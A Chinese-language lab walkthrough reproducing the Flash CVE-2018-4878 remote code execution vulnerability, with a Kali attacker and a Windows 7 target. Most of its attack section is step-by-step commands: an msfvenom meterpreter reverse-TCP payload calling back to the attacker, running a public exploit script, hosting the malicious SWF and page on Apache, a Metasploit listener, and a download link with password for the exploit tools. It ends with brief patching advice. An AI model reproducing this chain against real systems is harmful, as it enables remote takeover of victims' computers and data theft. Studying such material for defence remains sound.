[漏洞復現] CVE-2018-4878 Flash 0day
2018年2月1號,Adobe官方發布安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻擊者通過構造特殊的Flash鏈接,當用戶用瀏覽器/郵件/Office訪問此Flash鏈接時,會被“遠程代碼執行”,並且直接被getshell。
直到2018年2月5號,Adboe才發布補丁來修復此0 day漏洞。
互聯網上出現的基於此Flash 0day漏洞進行攻擊的樣本,其實在2017年底就已經由韓國計算機應急小組(KR-CERT)首次發現。
目前,全網已經有比較成熟的針對此Flash漏洞的利用代碼,接下來,我們為大家復現整個過程。
2、漏洞復現環境
Kali Linux + Windows 7 sp1
滲透機:Kali Linux (ip:172.16.70.216)
靶機:Windows 7 sp1 (ip:172.16.70.199)
exp:cve-2018-4878.py
flash:flashplayer_activex_28.0.0.137.exe
註:此實驗環境所用滲透機和靶機,跟之前文章所分享一致。為了節省大家實驗時間,我將此實驗涉及到的工具全部上傳到網盤=>
鏈接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密碼:0li0
3、實驗流程
①將網盤中的CVE-2018-4878-master 目錄下載下來,並放入Kali Linux桌面
②使用msfvenom生成shell代碼
生成代碼,其中lhost為kali的ip地址,lport為自定義的端口號
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888 -f python>shellcode.txt
查看代碼文件 root@kali:~# cat shellcode.txt
③進入CVE-2018-4878-master目錄,編輯CVE-2018-4878.py文件
將上面msfvenom生成的代碼覆蓋掉原來的代碼:
修改CVE-2018-4878.py下面的文件信息(後面會用到,之後保存修改退出):
④Kali Linux進入CVE-2018-4878-master路徑,用Python執行CVE-2018-4878-master.py代碼
root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py
root@kali:~/Desktop/CVE-2018-4878-master# ls -l
⑤Kali Linux開啟Apache2服務,並將上面的2個文件放入/var/www/html目錄中(apache web路徑)
root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf
此時,Kali Linux上Web服務啟動,並且具備index2.html這個頁面。只要靶機啟用flash並訪問了這個頁面,則可以直接被控制。
⑥Kali Linux開啟Shell會話監聽
使用handler監聽模塊 msf > use exploit/multi/handler
回彈一個tcp連接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
設置kali滲透機的ip地址 msf exploit(handler) > set lhost 172.16.70.216
設置監聽端口,這個需跟上面msfvenom設置的端口一致 msf exploit(handler) > set lport 8888
開啟監聽,等待肉雞上線 msf exploit(handler) > exploit
⑦Windows7 安裝flash插件,並用IE瀏覽器訪問頁面
搜索flash最新的28版本
安裝flash插件
使用Win7內置IE 8瀏覽器訪問頁面:http://172.16.70.216/index2.html
⑧Kali Linux 上獲取meterpreter shell,並進行管理
實驗總結:
可以看到,最終由於Flash存在CVE-2018-4878這個高危漏洞,導致Windows靶機訪問含flash的頁面時,直接被Kali Linux控制。
真實環境下,很多黑客基於此Flash漏洞,結合社會工程學,例如將網頁鏈接放置在誘導郵件中,欺騙大量用戶點擊,來達到最規模攻擊效果。
在這裏也呼籲大家:平常要非常小心陌生鏈接,類似這種“一點就中招”的高級滲透攻擊,肯定還有很多沒有浮出水面。像這個2017年其實已經出現的漏洞,早就有黑客已經在使用了,而中招者完全不知情,整個攻擊手法非常隱蔽。而2018年2月才有安全補丁,在這期間,有多少肉雞被控制,這個難以想象。很多0day漏洞,黑客比大部分人都要提前知曉,在安全廠商沒有出安全公告,或者沒有打安全補丁的情況下,一個不小心,就會導致電腦被劫持,數據被竊取,造成極大的損失。
4、漏洞修復
①直接到Adobe Flash官網,下載最新版本:https://get.adobe.com/cn/flashplayer/
②安裝常見殺毒軟件,開啟實時防護和殺毒引擎實時升級。
相關推文:
[漏洞復現] MS17-010 基於"永恒之藍"實現Windows Getshell
[漏洞復現] CVE-2017-11882 通殺所有Office版本
[漏洞復現] CVE-2017-16995 Ubuntu16.04
[漏洞復現] CVE-2018-4878 Flash 0day